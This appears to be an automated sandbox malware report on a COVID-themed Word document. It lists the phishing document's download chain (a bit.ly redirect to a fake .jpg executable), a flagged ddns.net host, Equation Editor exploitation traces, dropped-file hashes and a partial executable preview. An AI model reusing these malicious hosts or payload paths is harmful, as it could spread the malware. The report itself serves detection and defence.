                      SourceDetectionScannerLabelLink
                      sgkmudder.org.tr2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg0%Avira URL Cloudsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bit.ly
                      67.199.248.10
                      truefalse
                        high
                        greatestyear2021.ddns.net
                        79.134.225.49
                        truetrue
                          unknown
                          sgkmudder.org.tr
                          93.89.224.134
                          truefalseunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpgfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://bit.ly/2Me6ei3false
                            high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl069577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmpfalse
                              high
                              http://crl.entrust.net/server1.crl069577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpfalse
                                high
                                http://ocsp.entrust.net0369577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl069577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.%s.comPA69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                low
                                http://www.diginotar.nl/cps/pkioverheid069577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://ocsp.entrust.net0D69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2352229975.0000000002481000.00000004.00000001.sdmpfalse
                                  high
                                  https://secure.comodo.com/CPS069577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpfalse
                                    high
                                    http://servername/isapibackend.dll69577.exe, 00000007.00000002.2354290555.0000000005BB0000.00000002.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpfalse
                                      high
                                      http://crl.entrust.net/2048ca.crl069577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpfalse
                                        high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        79.134.225.49
                                        unknownSwitzerland
                                        6775FINK-TELECOM-SERVICESCHtrue
                                        93.89.224.134
                                        unknownTurkey
                                        51557TR-FBSTRfalse
                                        67.199.248.10
                                        unknownUnited States
                                        396982GOOGLE-PRIVATE-CLOUDUSfalse

                                        General Information

                                        Joe Sandbox Version:31.0.0 Emerald
                                        Analysis ID:356233
                                        Start date:22.02.2021
                                        Start time:19:51:43
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 9m 10s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Deadly Variants of Covid 19.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winDOC@8/18@3/3
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 2.3% (good quality ratio 1.1%)
                                        • Quality average: 29.8%
                                        • Quality standard deviation: 36.4%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded IPs from analysis (whitelisted): 8.248.143.254, 8.248.121.254, 8.248.135.254, 8.253.95.249, 67.26.73.254
                                        • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        19:52:37API Interceptor108x Sleep call for process: EQNEDT32.EXE modified
                                        19:52:42API Interceptor310x Sleep call for process: 69577.exe modified
                                        19:52:50API Interceptor1x Sleep call for process: schtasks.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        79.134.225.497yhKFXCKYX.exeGet hashmaliciousBrowse
                                          R8IaYkCPbJ.exeGet hashmaliciousBrowse
                                            hgGLLf6MMg.exeGet hashmaliciousBrowse
                                              BLPL902938475.exeGet hashmaliciousBrowse
                                                70invoicefdp.exeGet hashmaliciousBrowse
                                                  93.89.224.134swift payment.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/2d/IMG_71106_SCANNED.jpg
                                                  DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/2d/waki.jpg
                                                  Order_130577.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/IDE/IMG_130577.pdf
                                                  IMG-6661.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/IDE/IMG-6661.pdf
                                                  IMG-60612.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/IDE/IMG-60612.pdf
                                                  P.O 119735.doc__.rtfGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/ID3/IMG_063382.pdf
                                                  IMG_155710.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/ID3/IMG_155710.pdf
                                                  IMG_761213.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/ID3/IMG_761213.pdf
                                                  IMG_4785.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/ID3/IMG_4785.pdf
                                                  IMG-51033.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/ID3/IMG-51033.pdf
                                                  IMG_688031.docGet hashmaliciousBrowse
                                                  • sgkmudder.org.tr/ID3/IMG_688031.pdf
                                                  67.199.248.10swift payment.docGet hashmaliciousBrowse
                                                  • bit.ly/2NmOCRI
                                                  IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                                  • bit.ly/3qIRVRz
                                                  IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                  • bit.ly/3duA4tQ
                                                  IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                  • bit.ly/3sdTreK
                                                  QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.docGet hashmaliciousBrowse
                                                  • bit.ly/3dCBRgm
                                                  DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                  • bit.ly/3bhrITG
                                                  Quote QU038097.docGet hashmaliciousBrowse
                                                  • bit.ly/3aom5Uu
                                                  IMG_51067.doc__.rtfGet hashmaliciousBrowse
                                                  • bit.ly/3djdyUC
                                                  IMG_123773.docGet hashmaliciousBrowse
                                                  • bit.ly/2Nsv9ym
                                                  B62672021 PRETORIA.docGet hashmaliciousBrowse
                                                  • bit.ly/3jOWhDW
                                                  DHL_014073.docGet hashmaliciousBrowse
                                                  • bit.ly/3ddwOmz
                                                  PO00004423.docGet hashmaliciousBrowse
                                                  • bit.ly/3dcJ7zg
                                                  IMG_06037.docGet hashmaliciousBrowse
                                                  • bit.ly/2Zh2NKi
                                                  IMG_Scan_10678.docGet hashmaliciousBrowse
                                                  • bit.ly/39WD2oM
                                                  deliverysorders.docGet hashmaliciousBrowse
                                                  • bit.ly/3cTqUGN
                                                  120210205164302_01047.docGet hashmaliciousBrowse
                                                  • bit.ly/2YXucRb
                                                  IMG_Scanned_030621.docGet hashmaliciousBrowse
                                                  • bit.ly/2YXcYmY
                                                  IMG_Scanned_67022.docGet hashmaliciousBrowse
                                                  • bit.ly/36Valqa
                                                  ORD005271444_0.docGet hashmaliciousBrowse
                                                  • bit.ly/36HJMol
                                                  PO_07712.docGet hashmaliciousBrowse
                                                  • bit.ly/3pA0TA4

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  bit.lyswift payment.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  SWIFT Payment W0301.docGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  _a6590.docxGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  Statement-ID28865611496334.vbsGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  Statement-ID21488878391791.vbsGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  Statement-ID72347595684775.vbsGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  Quotation408S_A02021_AHYAN_group_of_companies.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  YOUR PRODUCT.docGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  PO00004423.xlsGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  PO00004423.xlsGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  Quote QU038097.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  SecuriteInfo.com.Heur.1706.xlsGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  SecuriteInfo.com.Heur.1706.xlsGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  IMG_51067.doc__.rtfGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  sgkmudder.org.trswift payment.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  Order_130577.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG-6661.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG-60612.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  P.O 119735.doc__.rtfGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG_155710.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG_761213.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG_4785.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG-51033.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG_688031.docGet hashmaliciousBrowse
                                                  • 93.89.224.134

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  FINK-TELECOM-SERVICESCHdocument.exeGet hashmaliciousBrowse
                                                  • 79.134.225.122
                                                  5293ea9467ea45e928620a5ed74440f5.exeGet hashmaliciousBrowse
                                                  • 79.134.225.105
                                                  f1a14e6352036833f1c109e1bb2934f2.exeGet hashmaliciousBrowse
                                                  • 79.134.225.105
                                                  256ec8f8f67b59c5e085b0bb63afcd13.exeGet hashmaliciousBrowse
                                                  • 79.134.225.105
                                                  JOIN.exeGet hashmaliciousBrowse
                                                  • 79.134.225.30
                                                  Delivery pdf.exeGet hashmaliciousBrowse
                                                  • 79.134.225.25
                                                  d88e07467ddcf9e3b19fa972b9f000d1.exeGet hashmaliciousBrowse
                                                  • 79.134.225.105
                                                  fnfqzfwC44.exeGet hashmaliciousBrowse
                                                  • 79.134.225.25
                                                  Solicitud de oferta 6100003768.exeGet hashmaliciousBrowse
                                                  • 79.134.225.96
                                                  Nrfgylra.exeGet hashmaliciousBrowse
                                                  • 79.134.225.96
                                                  HTQ19-P0401-Q0539 NE-Q22940 GR2P5 TYPBLDG-NASER AL FERDAN.exeGet hashmaliciousBrowse
                                                  • 79.134.225.62
                                                  HTQ19-P0401-Q0539 NE-Q22940 GR2P5 TYPBLDG-NASER AL FERDAN.exeGet hashmaliciousBrowse
                                                  • 79.134.225.62
                                                  HTQ19-P0401-Q0539 NE-Q22940 GR2P5 TYPBLDG-NASER AL FERDAN.exeGet hashmaliciousBrowse
                                                  • 79.134.225.62
                                                  Form pdf.exeGet hashmaliciousBrowse
                                                  • 79.134.225.25
                                                  Quotation 3342688.exeGet hashmaliciousBrowse
                                                  • 79.134.225.120
                                                  REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                  • 79.134.225.76
                                                  Orden.exeGet hashmaliciousBrowse
                                                  • 79.134.225.6
                                                  Ordine.exeGet hashmaliciousBrowse
                                                  • 79.134.225.11
                                                  73a4f40d0affe5eea89174f8917bba73.exeGet hashmaliciousBrowse
                                                  • 79.134.225.105
                                                  ToolNcatalogpri00088756564162021.exeGet hashmaliciousBrowse
                                                  • 79.134.225.45
                                                  GOOGLE-PRIVATE-CLOUDUSswift payment.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  SWIFT Payment W0301.docGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  _a6590.docxGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  Statement-ID28865611496334.vbsGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  Statement-ID21488878391791.vbsGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  Statement-ID72347595684775.vbsGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  Quotation408S_A02021_AHYAN_group_of_companies.docGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  Invoice.pptGet hashmaliciousBrowse
                                                  • 67.199.248.17
                                                  Invoice.pptGet hashmaliciousBrowse
                                                  • 67.199.248.16
                                                  Invoice.pptGet hashmaliciousBrowse
                                                  • 67.199.248.17
                                                  DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  YOUR PRODUCT.docGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  PO00004423.xlsGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  PO00004423.xlsGet hashmaliciousBrowse
                                                  • 67.199.248.11
                                                  Quote QU038097.docGet hashmaliciousBrowse
                                                  • 67.199.248.10
                                                  TR-FBSTRswift payment.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  Order_130577.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG-6661.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG-60612.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  P.O 119735.doc__.rtfGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG_155710.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG_761213.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG_4785.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG-51033.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  IMG_688031.docGet hashmaliciousBrowse
                                                  • 93.89.224.134
                                                  payment.exeGet hashmaliciousBrowse
                                                  • 185.33.234.169
                                                  AWB-20201208.2838479893_TR.exeGet hashmaliciousBrowse
                                                  • 185.33.234.169
                                                  PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                                  • 93.89.226.17
                                                  OwUewak654.exeGet hashmaliciousBrowse
                                                  • 185.33.234.229
                                                  MA24JwXQQB.exeGet hashmaliciousBrowse
                                                  • 185.33.234.169
                                                  yzNugTeWWx.exeGet hashmaliciousBrowse
                                                  • 185.33.234.169
                                                  AWB-18267638920511_ES.exeGet hashmaliciousBrowse
                                                  • 185.33.234.169
                                                  0000001612.exeGet hashmaliciousBrowse
                                                  • 185.33.234.169
                                                  PO 48009927TH.exeGet hashmaliciousBrowse
                                                  • 185.33.234.169

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                  Process:C:\Users\Public\69577.exe
                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                  Category:dropped
                                                  Size (bytes):59134
                                                  Entropy (8bit):7.995450161616763
                                                  Encrypted:true
                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                  Process:C:\Users\Public\69577.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):328
                                                  Entropy (8bit):3.090852246460565
                                                  Encrypted:false
                                                  SSDEEP:6:kKOsPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:7W3kPlE99SNxAhUeo+aKt
                                                  MD5:4C263222F99F8CCD3BFF78D11287343A
                                                  SHA1:EE20F124605FDE40B3F6CEE545E8D0D9D69F7538
                                                  SHA-256:6F6ECD80E49016ECD6284D61DF45B979CA2C27112B6E4E1FE0DD09260BE75D77
                                                  SHA-512:B87A0B87DBFDCD02EB3FF34E9FF9E9B56D73277E2E50703BAA1B03634030BADEDDCDD952CFB1061699B9BB8271AAEB5C3D63D6E415A24C7913B5CD8A9B61162A
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: p...... ........]..`....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:downloaded
                                                  Size (bytes):1143808
                                                  Entropy (8bit):6.509278540577558
                                                  Encrypted:false
                                                  SSDEEP:12288:GRe0EHIOjYgydfAv9kmIdffnlyMNZVjswXXyyWp+X117FlTxvrvt:TVydf2IdffY+rwwX77FlTxR
                                                  MD5:DCCD2F6A61F8D95552863B537F2B6698
                                                  SHA1:62C9D1B5C489133CBC0F19F3902724847BBFD765
                                                  SHA-256:3266A27BD3BB930017AA09BC7483AB2E047292B47F9D9C5796C02FA566D00CFE
                                                  SHA-512:E63F98F144CF843D1A920C37A9BBB689F3ACF11697637DB70636C842323805A5E3FC2DEDBAE9CC53FB5FEBC4D8D2E37E0E5BE3E59EDD6FEE44A90FB92699FFE3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 11%
                                                  Reputation:low
                                                  IE Cache URL:http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3`..............P..&...L.......E... ........@.. ....................................@.................................XE..S....`...J........................................................................... ............... ..H............text....%... ...&.................. ..`.rsrc....J...`...J...(..............@..@.reloc...............r..............@..B.................E......H........E..\............g..(............................................0..#.......+.&...(....(..........(.....o.....*..................0..........+.&..8......8.....+3...a.+....a....YE................I.....+......&..+.....+....YE................&.......=...X...a...w.........+.+...(......+....8}........&..8p......8h.....(.....=.8Y.....(....+.(....8C....?.8>.....<.85.....(....+..8......8......>.8....*..0..........+.&...+H.. a.+....a8.......X+H..(H....+......&..+...%YE........6
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\2Me6ei3[1].htm
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):133
                                                  Entropy (8bit):4.839899666314567
                                                  Encrypted:false
                                                  SSDEEP:3:qVvzLURODccZ/vXbvx9nDyiNCU1SLxKRGhEPGRHFSXbKFvNGb:qFzLIeco3XLx92iQU3cEPWSLWQb
                                                  MD5:88C573C24367B4A46F244961AB26A151
                                                  SHA1:3A8C4FC70ACD33D906DA6F34169FF5554B0E82D4
                                                  SHA-256:1C33F2A85277E75A8BE212C6CBC947DC1AC6BDD9162132386A91FFE303314429
                                                  SHA-512:C49661A08AEBC5D2C1A93BC8F8BDA3B0C2585F6F076DC61BFB80B2D14F546C56F76DB035B6725B459823E4948E52BFC8E5EF163949B642340049F8F22B85994A
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: <html>.<head><title>Bitly</title></head>.<body><a href="http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg">moved here</a></body>.</html>
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AD9C643-349E-46EF-BF24-C3A751787722}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CA5B12C-492C-4E57-AE2D-0E7798ADDEF4}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1474130
                                                  Entropy (8bit):4.189631552288507
                                                  Encrypted:false
                                                  SSDEEP:24576:j7np9HpHZHSHVVndnVsHtHBPDHnbnnrHzHfH7Ho0nonQEHtHnHF:jbnJ5y1V9aNhLH7rT/bIkYfNHl
                                                  MD5:7C382FAFE594F20C1C7308821CF166C4
                                                  SHA1:8200943429016BB115C69F2E9E0F102E85CD44D8
                                                  SHA-256:45503DF30500D85200E4F8E266467C6B894940BF0A52D9FAC49CC88BE619A276
                                                  SHA-512:54B4925EE55D2A17D8DF9DAF19B22A9617A62697D889A3C83697CD812A8F5294C5531D4526871E7F78C627A34A408F059021D2102E677785A100B5D53A1DDF17
                                                  Malicious:false
                                                  Reputation:low
